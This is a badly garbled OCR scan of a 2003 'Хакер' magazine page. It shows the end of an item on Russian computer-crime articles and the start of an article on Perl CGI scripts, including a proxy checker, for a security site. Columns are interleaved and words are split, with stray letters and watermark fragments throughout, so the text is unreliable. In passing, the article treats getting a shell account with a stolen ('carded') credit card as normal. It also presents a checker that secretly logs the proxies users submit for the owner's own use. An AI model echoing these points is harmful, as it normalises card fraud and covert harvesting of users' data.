кодексу), выходит две уголовные статьи - вы-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

шеуказанная 273 (до трех лет + штраф) и еще

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

272 (до двух лет + штраф): "неправомерный

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

доступ к компьютерной информации" (то есть

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

5 Юниксоид 6 X-Стиль

7 Кодинг

8 Юниты

9 Quit>

 

 

 

 

 

67

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

ХАКЕР\¹49\Январь\2003

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

<Page 068>

 

 

 

 

 

 

 

 

 

 

NOW!

 

 

 

 

 

 

 

 

BUY

NOW!

 

 

 

 

 

 

Ìàññ-

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

Взлом

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

m

 

 

 

w

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

 

 

 

o

 

 

 

w Click

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

 

.c

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

df

 

 

 

 

 

 

e

 

 

 

 

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

МАСС-СКРИПТИЗАЦИЯ, ИЛИ КАК

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

РАСКРУТИТЬ СВОЙ САЙТ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Докучаев Дмитрий aka Forb

 

 

скриптизация,

 

 

 

 

 

 

 

 

 

 

 

 

 

(forb@real.xakep.ru)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

или как раскрутить свой сайт

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

4 скрипта на все случаи жизни

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Приветствую тебя, создатель сайта, посвященного вопросам безопасности. Именно на таких читателей и рассчитана

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

столь полезная статья ;). Не бойся, я не буду тебя учить, как зарегистрировать сайт на поисковиках или устроить

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

спам-рассылку с рекламой твоего нового проекта. Я уверен, что ты это уже сделал сам, в противном случае прочитай

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

об этом в инете. Мы же займемся более чистой работой - обзором скриптов, которые можно поместить на любой

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

(ну, или практически любой) сайт по вопросам безопасности (или взлома - рассчитывай как хочешь).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Три основных

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

способа

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

исправления ошибки

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

500.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

INTRO

 

Ошибка 500 является внутренней ошиб-

(они заполняются клиентом). По-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Èòàê,

мыслим последовательно и

кой скрипта. Это происходит, в основ-

сле их заполнения параметры пе-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ном, по трем банальным причинам:

 

редаются скрипту, проверяюще-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

анализируем ситуацию. Допустим, у

1. Скрипт залит не в ASCII-режиме.

 

му прокси. Он пытается осущест-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тебя есть хостинг, обязательно пре-

Каждый скрипт в /cgi-bin обязательно

вить соединение с сервером, и

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

доставляющий cgi. Неважно, где ты

если ему это удалось, то запро-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

должен быть закачан в текстовом режи-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

его достал - скардил шелл, зарегил

сить данные на какой-либо быст-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ме (отброс лишних символов в конце

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ïî

 

какой-либо кредитке

èëè, êàê

рый сервер

(в моем случае

-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

строки), тогда данной ошибки не воз-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

большинство честных граждан интер-

www.rambler.ru) и поймать заго-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

никнет. Но это актуально только для

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нета =), зарегистрировался, напри-

ловок HTTP-протокола (то есть

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мер, на www.h1.ru. Но, тем не менее,

win-пользователей.

 

 

ответ сервера – 200 - OK, 403 -

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

во всех вышеизложенных предполо-

2. На скрипт не установлен атрибут

 

Access Denied, etc). Затем, при

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

жениях ты являешься потенциально

755 (либо другой атрибут, оговаривае-

успешном соединении скрипт ак-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

способным поднять рейтинг своего

мый в инструкции твоего хостинга).

 

куратненько записывает резуль-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сайта на жизненно важных Perl-

755 - атрибут исполнения файла для

тат в лог-файл (какая же польза

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

скриптах.

 

всех пользователей, что позволит web-

владельцу без лога рабочих про-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

"Что это за зверь такой – жизненно

ксиков!) и выдает результат кли-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

серверу выполнить его через интерпре-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

важный Perl-скрипт?" - спросишь ты.

енту в удобочитаемой форме.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

татор.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

"Это виртуальная "еда" интернета" -

 

 

 

На что тебе придется обратить

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

3. Неверный заголовок cgi-скрипта, то

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

скажу я, и, пожалуй, буду прав. Хоро-

внимание при написании чекера?

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

есть путь к Perl-интерпретатору. По

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

шо-хорошо, не буду тебя томить,

Во-первых, как ни банально это

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

речь идет о четырех важных скрип-

умолчанию этот заголовок

 

 

звучит - на атрибуты файлов.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тах, которыми почти каждый день

#!/usr/bin/perl, но не на всех машинах

Сам скрипт обязательно должен

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пользуются продвинутые (ну, и не

путь именно такой. Лучше спросить ад-

иметь атрибут 755 (выставляется

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

очень) пользователи глобальной се-

министратора сервера про путь к perl.

командой FTP - SITE CHMOD 755

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

òè.

 

 

 

 

Только не усердствуй с вопросами: ад-

proxy.cgi), логфайл (по умолча-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Почему Perl, а не, например, php, ко-

мины народ нервный, поэтому не стоит

нию proxylist.txt должен иметь ат-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

торый в наше время стал очень попу-

рибут 666 (для записи в него со

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

изнурять их своими глупостями.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лярным? Во-первых, php предостав-

 

стороны httpd).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ляется отнюдь не на всех хостингах

 

 

 

 

 

По умолчанию в каталоге чекера

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

(особенно бесплатных), а во-вторых,

 

 

 

 

 

лежит html-файл с обычной таб-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

приевшиеся в течение нескольких лет

 

нужно завлекать WWW-шников. Читаю твои мыс-

 

личкой безо всякого дизайна

(ÿ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Perl-модули все же на голову превосходят php и

надеюсь, ты справишься с этим недостатком ;)). Я

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ли в правильном направлении - необходимо по-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

выполняют порой очень сложные задачи.

 

сделал это, понимая, что на вкус и цвет товарищей

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

местить на сайт какие-нибудь сканеры или чеке-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Итак, по порядку. Подумай, чем твой сайт может

нет. Некоторым сподручнее сделать чекер отдель-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ры =). Этим мы и займемся!

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

привлечь юзеров? Предполагаю возможные ва-

 

ной страницей, а некоторым - маленьким компакт-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рианты - полезной инфой, рулезными прогами...

МУТИМ ПРИВАТНЫЙ PROXYCHECKER

 

ным окошечком слева (или справа) на сайте.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Но ты ведь понимаешь, что пользователь, кото-

 

Таким образом, установив себе этот неболь-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рый обошел "с индекса до индекса" твой сайт без

Первый наш скрипт будет посвящен такой про-

шой скриптик (размер около килобайта), ты

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

частых обновлений (еще бы - легче застрелиться,

привлечешь массу пользователей, желающих

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

блеме, как проверка на валидность прокси-сер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

чем обновлять сайт) больше туда не зайдет. По-

проверить на валидность proxy-сервер, и сам

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

веров. Постараюсь кратко описать механизм дей-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

правлюсь, он зайдет, но, не увидев ничего ново-

извлечешь пользу, прочитав через недельку-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ствия скрипта. Имеются два поля: хост и порт

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

го, снова уйдет. Чтобы такого не происходило,

другую proxylist.txt.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

68 Ньюсы

1 Феррум

2 Inside

3 PC_Zone

4 Взлом

 

 

 

 

 

 

 

Соседние файлы в папке журнал хакер